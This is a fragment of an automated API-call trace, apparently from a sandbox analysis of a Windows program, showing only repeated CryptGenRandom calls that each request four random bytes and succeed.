CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.210] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.211] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.214] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 